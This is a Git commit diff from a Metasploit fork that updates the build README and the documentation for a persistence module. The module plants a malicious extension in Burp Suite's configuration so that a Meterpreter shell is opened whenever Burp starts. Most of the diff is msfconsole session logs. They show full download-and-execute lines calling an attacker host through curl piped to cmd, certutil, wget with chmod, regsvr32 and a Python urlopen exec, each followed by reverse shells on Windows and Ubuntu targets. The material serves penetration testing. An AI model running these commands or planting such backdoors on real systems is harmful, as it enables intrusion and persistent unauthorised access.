adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions 9 Packages Projects Releases Wiki Activity

burp extension all working

Browse Source
This commit is contained in:
h00die
2026-01-16 08:44:27 -05:00
parent fa83217a07
commit 7ccf574e99
5 changed files with 459 additions and 186 deletions
Download Patch File Download Diff File Expand all files Collapse all files
.gitignore
+3
View File
@@ -102,3 +102,6 @@ rspec.failures
#Ignore any base disk store files
db/modules_metadata_base.pstore
# gradle build files
**/.gradle
data/exploits/burp_extension/README.md
+7 -8
View File
@@ -1,10 +1,9 @@
Build: `gradle clean build`
# Prerequisites
Extension Location: `build/libs/MetasploitPayloadExtension.jar`
You'll need `gradle` which can be installed on Kali via `sudo apt-get install gradle`
Updating payload in module:
1. Run the build command inside of this folder (`<metasploit_folder>data/exploits/burp_extension`)
2. `jar xf build/libs/MetasploitPayloadExtension.jar`
1. Use this command to print out the hex: `python3 -c "with open('burp/BurpExtender.class', 'rb') as f: print(''.join([chr(b) if 32 <= b <= 126 else '\\\\x{:02x}'.format(b) for b in f.read()]))"`
2. You'll still need to escape `\` and `"` characters.
3. cp `burp/BurpExtender.class` `<metasploit_folder>/data/exploits/burp_extension/precompiled.class`
# Build
1. Build: `gradle clean build`
1. Post build extension location: `build/libs/MetasploitPayloadExtension.jar`
2. Copy the files into the proper location: `cp build/classes/java/main/burp/BurpExtender.class precompiled.class`
data/exploits/burp_extension/precompiled.class
BIN
View File
Binary file not shown.
documentation/modules/exploit/multi/persistence/burp_extension.md
+444 -174
View File
@@ -3,9 +3,8 @@
This module adds a java based malicious extension to the Burp Suite configuration file.
When burp is opened, the extension will be loaded and the payload will be executed.
Tested against Burp Suite Community Edition v2024.9.4 on Kali.
Tested against Burp Suite Professional ??? on Kali.
Tested against Burp Suite Community Edition v2024.10.3 on Windows 10.
Tested against Burp Suite Community Edition v2024.9.4, on Ubuntu Desktop 24.04.
Tested against Burp Suite Community Edition v2025.12.3 on Windows 10.
## Verification Steps
@@ -16,7 +15,7 @@ Tested against Burp Suite Community Edition v2024.10.3 on Windows 10.
5. Do: `set session #`
6. Do: `set writabledir <directory>`
7. Do: `run`
8. Once the extension is installed, you should get a shell
8. Once the extension is installed, and burp started, you should get a shell
## Options
@@ -41,209 +40,480 @@ User to target, or current user if blank
If action is set to build, the local location of the gradle executable to build the extension with.
Defaults to `/usr/bin/gradle`
### Action: precompiled
## Action
### precompiled
Use pre-compiled bytecode, Gradle is not required
### Action: build
### build
Build the extension locally with Gradle.
## Scenarios
### Linux/Kali Burp 2024.10.3
### Burp 2025.12.3 on Windows 10, precompiled with Windows target
Initial access
Initial Access
```
[msf](Jobs:0 Agents:0) > use exploit/multi/script/web_delivery
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > setg verbose
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > setg lhost 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set target 0
target => 0
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) >
[*] Started reverse TCP handler on 1.1.1.1:4646
[*] Using URL: http://1.1.1.1:8282/dRgZhDZiHCi7X
[*] Server started.
[*] Run the following command on the target machine:
python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://1.1.1.1:8282/dRgZhDZiHCi7X', context=ssl._create_unverified_context());exec(r.read());"
[*] 1.1.1.1 web_delivery - Delivering Payload (436 bytes)
[*] Sending stage (24772 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (1.1.1.1:4646 -> 1.1.1.1:44554) at 2025-01-21 14:26:57 -0500
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/VIFzePGTMLa1dcpTvMRQBg & start /B %TEMP%\mkaKJBzbDB.exe
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1
[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /VIFzePGTMLa1dcpTvMRQBg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) >
[*] Client 2.2.2.2 requested /w3
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Client 2.2.2.2 requested /VIFzePGTMLa1dcpTvMRQBg
[*] Sending payload to 2.2.2.2 (curl/7.79.1)
[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:55729) at 2026-01-16 05:24:25 -0500
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/root/metasploit-framework) > sysinfo
Computer : kali
OS : Linux 6.11.2-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.11.2-1kali1 (2024-10-15)
meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > sysinfo
Computer : WIN10PROLICENSE
OS : Windows 10 1909 (10.0 Build 18363).
Architecture : x64
System Language : en_US
Meterpreter : python/linux
(Meterpreter 1)(/root/metasploit-framework) > getuid
Server username: h00die
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > background
[*] Backgrounding session 1...
```
#### Burp via Build
Install Persistence
```
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/multi/local/burp_extension_persistence
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/multi/persistence/burp_extension
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
[*] Using action precompiled - view all 2 actions with the show actions command
[msf](Jobs:1 Agents:1) exploit(multi/local/burp_extension_persistence) > set session 1
[*] Setting default action precompiled - view all 2 actions with the show actions command
msf exploit(multi/persistence/burp_extension) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(multi/local/burp_extension_persistence) > set action build
action => build
[msf](Jobs:1 Agents:1) exploit(multi/local/burp_extension_persistence) > set target 1
target => 1
[msf](Jobs:0 Agents:1) exploit(multi/local/burp_extension_persistence) > set action build
action => build
[msf](Jobs:0 Agents:1) exploit(multi/local/burp_extension_persistence) > set target 1
target => 1
[msf](Jobs:0 Agents:1) exploit(multi/local/burp_extension_persistence) > set writabledir /tmp/
writabledir => /tmp/
[msf](Jobs:0 Agents:1) exploit(multi/local/burp_extension_persistence) > set payload cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:1) exploit(multi/local/burp_extension_persistence) > exploit
[*] Exploit running as background job 3.
msf exploit(multi/persistence/burp_extension) > set target 2
target => 2
msf exploit(multi/persistence/burp_extension) > set PAYLOAD cmd/windows/http/x64/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(multi/persistence/burp_extension) > set lport 9812
lport => 9812
msf exploit(multi/persistence/burp_extension) > set writabledir c:\\users\\windows\\desktop
writabledir => c:\users\windows\desktop
msf exploit(multi/persistence/burp_extension) > rexploit
[*] Reloading module...
[*] Command to run on remote host: certutil -urlcache -f http://1.1.1.1:8080/v3fXAwPgMBDCL44G1aW0KQ %TEMP%\CYdTYFAds.exe & start /B %TEMP%\CYdTYFAds.exe
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:1 Agents:1) exploit(multi/local/burp_extension_persistence) >
[*] Started reverse TCP handler on 1.1.1.1:4444
[!] SESSION may not be compatible with this module:
msf exploit(multi/persistence/burp_extension) >
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /v3fXAwPgMBDCL44G1aW0KQ
[*] Started reverse TCP handler on 1.1.1.1:9812
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Home path detected as: C:\Users\windows
[!] The service is running, but could not be validated. Found UserConfig file C:\Users\windows\AppData\Roaming\Burpsuite\UserConfigCommunity.json
[*] Burp UserConfig file: C:\Users\windows\AppData\Roaming\Burpsuite\UserConfigCommunity.json
[*] Burp JAR file: C:\Users\windows\AppData\Local\BurpSuiteCommunity\burpsuite_community.jar
[*] Creating extension
[*] Using extension name: BuIwiN
[*] Creating JAR file
[*] Writing malicious extension to disk: c:\users\windows\desktop\BuIwiN.jar
[*] Modifying Burp configuration and adding malicious extension
[+] Config file saved in: /root/.msf4/loot/20260116054809_default_2.2.2.2_burp.config.json_765439.bin
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260116.4809/WIN10PROLICENSE_20260116.4809.rc
```
Launch Burp
```
[*] Client 2.2.2.2 requested /v3fXAwPgMBDCL44G1aW0KQ
[*] Sending payload to 2.2.2.2 (Microsoft-CryptoAPI/10.0)
[*] Client 2.2.2.2 requested /v3fXAwPgMBDCL44G1aW0KQ
[*] Sending payload to 2.2.2.2 (CertUtil URL Agent)
[*] Sending stage (230982 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:9812 -> 2.2.2.2:55876) at 2026-01-16 05:49:34 -0500
```
### Burp 2025.12.3 on Windows 10, build with Java target
Initial Access
```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
fetch_command => CURL
resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
fetch_pipe => true
resource (/root/.msf4/msfconsole.rc)> set lport 4450
lport => 4450
resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
FETCH_URIPATH => w3
resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
FETCH_FILENAME => mkaKJBzbDB
resource (/root/.msf4/msfconsole.rc)> to_handler
[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/VIFzePGTMLa1dcpTvMRQBg & start /B %TEMP%\mkaKJBzbDB.exe
[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
[*] Payload Handler Started as Job 0
[*] Fetch handler listening on 1.1.1.1:8080
[*] HTTP server started
[*] Adding resource /VIFzePGTMLa1dcpTvMRQBg
[*] Adding resource /w3
[*] Started reverse TCP handler on 1.1.1.1:4450
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > [*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:55900) at 2026-01-16 05:53:50 -0500
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > sysinfo
Computer : WIN10PROLICENSE
OS : Windows 10 1909 (10.0 Build 18363).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > background
[*] Backgrounding session 1...
```
Install Persistence
```
msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/multi/persistence/burp_extension
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
[*] Setting default action precompiled - view all 2 actions with the show actions command
msf exploit(multi/persistence/burp_extension) > set session 1
session => 1
msf exploit(multi/persistence/burp_extension) > set action build
action => build
msf exploit(multi/persistence/burp_extension) > set PAYLOAD payload/java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(multi/persistence/burp_extension) > set lport 9815
lport => 9815
msf exploit(multi/persistence/burp_extension) > set writabledir c:\\users\\windows\\desktop
writabledir => c:\users\windows\desktop
msf exploit(multi/persistence/burp_extension) > rexploit
[*] Reloading module...
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(multi/persistence/burp_extension) >
[*] Started reverse TCP handler on 1.1.1.1:9815
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Gradle found
[*] Home path detected as: C:\Users\windows
[!] The service is running, but could not be validated. Found UserConfig file C:\Users\windows\AppData\Roaming\Burpsuite\UserConfigCommunity.json
[*] Burp UserConfig file: C:\Users\windows\AppData\Roaming\Burpsuite\UserConfigCommunity.json
[*] Burp JAR file: C:\Users\windows\AppData\Local\BurpSuiteCommunity\burpsuite_community.jar
[*] Creating extension
[*] Using extension name: IoWH
[*] Creating JAR file
[*] Building Burp extension jar file locally in /tmp/d20260116-127808-hkcygo
openjdk version "21.0.10-ea" 2026-01-20
OpenJDK Runtime Environment (build 21.0.10-ea+4-Debian-1)
OpenJDK 64-Bit Server VM (build 21.0.10-ea+4-Debian-1, mixed mode, sharing)
Starting a Gradle Daemon (subsequent builds will be faster)
:clean UP-TO-DATE
:compileJava
:processResources
:classes
:jar
:assemble
:compileTestJava NO-SOURCE
:processTestResources NO-SOURCE
:testClasses UP-TO-DATE
:test NO-SOURCE
:check UP-TO-DATE
:build
BUILD SUCCESSFUL in 7s
4 actionable tasks: 3 executed, 1 up-to-date
[+] Successfully built the jar file /tmp/d20260116-127808-hkcygo/build/libs/MetasploitPayloadExtension.jar
[*] Writing malicious extension to disk: c:\users\windows\desktop\IoWH.jar
[*] Modifying Burp configuration and adding malicious extension
[+] Config file saved in: /root/.msf4/loot/20260116060148_default_2.2.2.2_burp.config.json_518370.bin
```
Launch Burp
```
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260116.0148/WIN10PROLICENSE_20260116.0148.rc
[*] Sending stage (58073 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:9815 -> 2.2.2.2:56020) at 2026-01-16 06:14:57 -0500
```
### Burp 2025.12.3 on Ubuntu 24.04, precompiled with Linux target
Initial Access
```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set srvport 8082
srvport => 8082
resource (/root/.msf4/msfconsole.rc)> set uripath l
uripath => l
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4446
lport => 4446
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4446
[*] Using URL: http://1.1.1.1:8082/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO wThmilCQ --no-check-certificate http://1.1.1.1:8082/l; chmod +x wThmilCQ; ./wThmilCQ& disown
msf exploit(multi/script/web_delivery) >
[*] 3.3.3.3 web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 3.3.3.3
[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 3.3.3.3:43276) at 2026-01-16 06:31:49 -0500
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: ubuntu
meterpreter > sysinfo
Computer : 3.3.3.3
OS : Ubuntu 24.04 (Linux 6.14.0-37-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > background
[*] Backgrounding session 1...
```
Install Persistence
```
msf exploit(multi/script/web_delivery) > use exploit/multi/persistence/burp_extension
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
[*] Setting default action precompiled - view all 2 actions with the show actions command
msf exploit(multi/persistence/burp_extension) > set session 1
session => 1
msf exploit(multi/persistence/burp_extension) > set target 1
target => 1
msf exploit(multi/persistence/burp_extension) > set PAYLOAD payload/cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf exploit(multi/persistence/burp_extension) > set lport 9816
lport => 9816
msf exploit(multi/persistence/burp_extension) > set writabledir /home/ubuntu/Desktop/
writabledir => /home/ubuntu/Desktop/
msf exploit(multi/persistence/burp_extension) > rexploit
[*] Reloading module...
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:9816
msf exploit(multi/persistence/burp_extension) > [!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_registry_check_key_exists, stdapi_registry_create_key, stdapi_registry_delete_key, stdapi_registry_enum_key_direct, stdapi_registry_enum_value_direct, stdapi_registry_load_key, stdapi_registry_open_key, stdapi_registry_query_value_direct, stdapi_registry_set_value_direct, stdapi_registry_unload_key, stdapi_sys_config_getprivs
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Home path detected as: /home/ubuntu
[!] The service is running, but could not be validated. Found UserConfig file /home/ubuntu/.BurpSuite/UserConfigCommunity.json
[*] Burp UserConfig file: /home/ubuntu/.BurpSuite/UserConfigCommunity.json
[*] Burp JAR file: /home/ubuntu/BurpSuiteCommunity/burpsuite_community.jar
[*] Creating extension
[*] Using extension name: KdqJR
[*] Creating JAR file
[*] Writing malicious extension to disk: /home/ubuntu/Desktop//KdqJR.jar
[*] Modifying Burp configuration and adding malicious extension
[+] Config file saved in: /root/.msf4/loot/20260116073105_default_3.3.3.3_burp.config.json_225090.bin
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/3.3.3.3_20260116.3105/3.3.3.3_20260116.3105.rc
```
Launch Burp
```
[*] Sending stage (23404 bytes) to 3.3.3.3
[*] Meterpreter session 2 opened (1.1.1.1:9816 -> 3.3.3.3:59798) at 2026-01-16 07:45:08 -0500
msf exploit(multi/persistence/burp_extension) >
```
### Burp 2025.12.3 on Ubuntu 24.04, build with Java target
Initial Access
```
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set srvport 8082
srvport => 8082
resource (/root/.msf4/msfconsole.rc)> set uripath l
uripath => l
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4446
lport => 4446
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4446
[*] Using URL: http://1.1.1.1:8082/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO z9hg2BUt --no-check-certificate http://1.1.1.1:8082/l; chmod +x z9hg2BUt; ./z9hg2BUt& disown
msf exploit(multi/script/web_delivery) >
[*] 3.3.3.3 web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 3.3.3.3
[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 3.3.3.3:59534) at 2026-01-16 07:54:07 -0500
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: ubuntu
meterpreter > sysinfo
Computer : 3.3.3.3
OS : Ubuntu 24.04 (Linux 6.14.0-37-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > background
[*] Backgrounding session 1...
```
Install Persistence
```
msf exploit(multi/script/web_delivery) > use exploit/multi/persistence/burp_extension
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
[*] Setting default action precompiled - view all 2 actions with the show actions command
msf exploit(multi/persistence/burp_extension) > set session 1
session => 1
msf exploit(multi/persistence/burp_extension) > set action build
action => build
msf exploit(multi/persistence/burp_extension) > set PAYLOAD payload/java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(multi/persistence/burp_extension) > set lport 9817
lport => 9817
msf exploit(multi/persistence/burp_extension) > set writabledir /home/ubuntu/Desktop/
writabledir => /home/ubuntu/Desktop/
msf exploit(multi/persistence/burp_extension) > rexploit
[*] Reloading module...
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:9817
msf exploit(multi/persistence/burp_extension) > [!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_registry_check_key_exists, stdapi_registry_create_key, stdapi_registry_delete_key, stdapi_registry_enum_key_direct, stdapi_registry_enum_value_direct, stdapi_registry_load_key, stdapi_registry_open_key, stdapi_registry_query_value_direct, stdapi_registry_set_value_direct, stdapi_registry_unload_key, stdapi_sys_config_getprivs
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Gradle found
[*] Found config file: /root/.java/.userPrefs/burp/prefs.xml
[*] Found config file: /root/.java/.userPrefs/burp/community/prefs.xml
[*] Config mentioned in settings, but not found: /tmp/burp.json
[!] The service is running, but could not be validated. No config file listed, only writing plugin to disk
[*] Using extension name: 0jPrAJt
[*] Home path detected as: /home/ubuntu
[!] The service is running, but could not be validated. Found UserConfig file /home/ubuntu/.BurpSuite/UserConfigCommunity.json
[*] Burp UserConfig file: /home/ubuntu/.BurpSuite/UserConfigCommunity.json
[*] Burp JAR file: /home/ubuntu/BurpSuiteCommunity/burpsuite_community.jar
[*] Creating extension
[*] Using extension name: YBFkQz
[*] Creating JAR file
[*] Building Burp extension jar file in /tmp/d20250121-7883-zppnzb
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
openjdk version "17.0.14-ea" 2025-01-21
OpenJDK Runtime Environment (build 17.0.14-ea+6-Debian-1)
OpenJDK 64-Bit Server VM (build 17.0.14-ea+6-Debian-1, mixed mode, sharing)
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Starting a Gradle Daemon (subsequent builds will be faster)
[*] Building Burp extension jar file locally in /tmp/d20260116-130356-yxz2cv
openjdk version "21.0.10-ea" 2026-01-20
OpenJDK Runtime Environment (build 21.0.10-ea+4-Debian-1)
OpenJDK 64-Bit Server VM (build 21.0.10-ea+4-Debian-1, mixed mode, sharing)
:clean UP-TO-DATE
:compileJava
:processResources
:classes
:jar
:assemble
:compileTestJava NO-SOURCE
:processTestResources NO-SOURCE
:testClasses UP-TO-DATE
:test NO-SOURCE
:check UP-TO-DATE
:build
BUILD SUCCESSFUL in 1s
BUILD SUCCESSFUL in 2s
4 actionable tasks: 3 executed, 1 up-to-date
[*] Writing malcious extension to disk: /tmp//0jPrAJt.jar
[+] Extension enabled, waiting for Burp to open with the config.
[*] Sending stage (24772 bytes) to 1.1.1.1
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 1.1.1.1:36144) at 2025-01-21 14:40:02 -0500
[+] Successfully built the jar file /tmp/d20260116-130356-yxz2cv/build/libs/MetasploitPayloadExtension.jar
[*] Writing malicious extension to disk: /home/ubuntu/Desktop//YBFkQz.jar
[*] Modifying Burp configuration and adding malicious extension
[+] Config file saved in: /root/.msf4/loot/20260116075456_default_3.3.3.3_burp.config.json_053290.bin
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/3.3.3.3_20260116.5456/3.3.3.3_20260116.5456.rc
```
Burp Extension Install
1. Open burp
2. Click Next for a Temporary project in memory
3. Click Start Burp
4. Select the Extensions tab
5. Click Add
6. Click Select file under Extension details, and pick the jar file which was uploaded to the target
7. Click Next
#### Burp via Precompiled and User Settings
Export user settings:
1. From the main GUI click Settings
2. Click the 3 dots in the top right corner
3. Select User settings > Save user settings
4. save the file. No extension is needed, it will be `json`
Import user settings:
1. From the main GUI click Settings
2. Click the 3 dots in the top right corner
3. Select User settings > Load user settings
4. select the file which was previously saved
5. Upon loading, the payload will execute
Launch Burp
```
[msf](Jobs:0 Agents:2) exploit(multi/local/burp_extension_persistence) > set action precompiled
action => precompiled
[msf](Jobs:0 Agents:1) exploit(multi/local/burp_extension_persistence) > set config /tmp/user_settings.json
config => /tmp/user_settings.json
[msf](Jobs:0 Agents:1) exploit(multi/local/burp_extension_persistence) > exploit
[*] Exploit running as background job 4.
[*] Exploit completed, but no session was created.
[msf](Jobs:1 Agents:1) exploit(multi/local/burp_extension_persistence) >
[*] Started reverse TCP handler on 1.1.1.1:4444
[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_registry_check_key_exists, stdapi_registry_create_key, stdapi_registry_delete_key, stdapi_registry_enum_key_direct, stdapi_registry_enum_value_direct, stdapi_registry_load_key, stdapi_registry_open_key, stdapi_registry_query_value_direct, stdapi_registry_set_value_direct, stdapi_registry_unload_key, stdapi_sys_config_getprivs
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Found config file: /root/.java/.userPrefs/burp/prefs.xml
[*] Found config file: /root/.java/.userPrefs/burp/community/prefs.xml
[*] Config mentioned in settings, but not found: /tmp/burp.json
[!] The service is running, but could not be validated. Config file found: /tmp/user_settings.json
[*] Using extension name: sDojM
[*] Creating JAR file
[*] Writing malcious extension to disk: /tmp//sDojM.jar
[*] Updating config file
[+] Config file saved in: /root/.msf4/loot/20250121145043_default_1.1.1.1_burp.config.json_619066.bin
[+] Extension written to disk, waiting for Burp to open and user to install extension.
[*] Sending stage (24772 bytes) to 1.1.1.1
[*] Meterpreter session 3 opened (1.1.1.1:4444 -> 1.1.1.1:37714) at 2025-01-21 14:52:27 -0500
```
### Windows
Initial shell
```
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > set target 3
target => 3
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 5.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:0) exploit(multi/script/web_delivery) >
[*] Started reverse TCP handler on 1.1.1.1:4646
[*] Using URL: http://1.1.1.1:8282/ZOfTYkv5jpRpcv
[*] Server started.
[*] Run the following command on the target machine:
regsvr32 /s /n /u /i:http://1.1.1.1:8282/ZOfTYkv5jpRpcv.sct scrobj.dll
[*] Sending stage (203846 bytes) to 2.2.2.2
[*] Meterpreter session 4 opened (1.1.1.1:4646 -> 2.2.2.2:51773) at 2025-01-21 15:11:44 -0500
```
Burp Extension
```
[msf](Jobs:0 Agents:1) exploit(multi/script/web_delivery) > use exploit/multi/local/burp_extension_persistence
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
[*] Using action precompiled - view all 2 actions with the show actions command
[msf](Jobs:0 Agents:1) exploit(multi/local/burp_extension_persistence) > set target 2
target => 2
[msf](Jobs:0 Agents:1) exploit(multi/local/burp_extension_persistence) > set action precompiled
action => precompiled
[msf](Jobs:0 Agents:1) exploit(multi/local/burp_extension_persistence) > set payload cmd/windows/powershell/meterpreter/reverse_tcp
payload => cmd/windows/powershell/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:1) exploit(multi/local/burp_extension_persistence) > set writabledir c:\\users\\windows\\Desktop\\
writabledir => c:\users\windows\Desktop\
[msf](Jobs:0 Agents:1) exploit(multi/local/burp_extension_persistence) > exploit
[*] Powershell command length: 4153
[*] Exploit running as background job 8.
[*] Exploit completed, but no session was created.
[msf](Jobs:1 Agents:1) exploit(multi/local/burp_extension_persistence) >
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Found config: C:///Users//windows///Desktop//burp_user_settings.json
[!] The service is running, but could not be validated. No config file listed, only writing plugin to disk
[*] Using extension name: EKHhAH9U
[*] Creating JAR file
[*] Writing malcious extension to disk: c:\users\windows\Desktop\/EKHhAH9U.jar
[+] Extension enabled, waiting for Burp to open with the config.
[*] Sending stage (177734 bytes) to 2.2.2.2
[*] Meterpreter session 5 opened (1.1.1.1:4444 -> 2.2.2.2:51899) at 2025-01-21 15:17:54 -0500
[*] Sending stage (58073 bytes) to 3.3.3.3
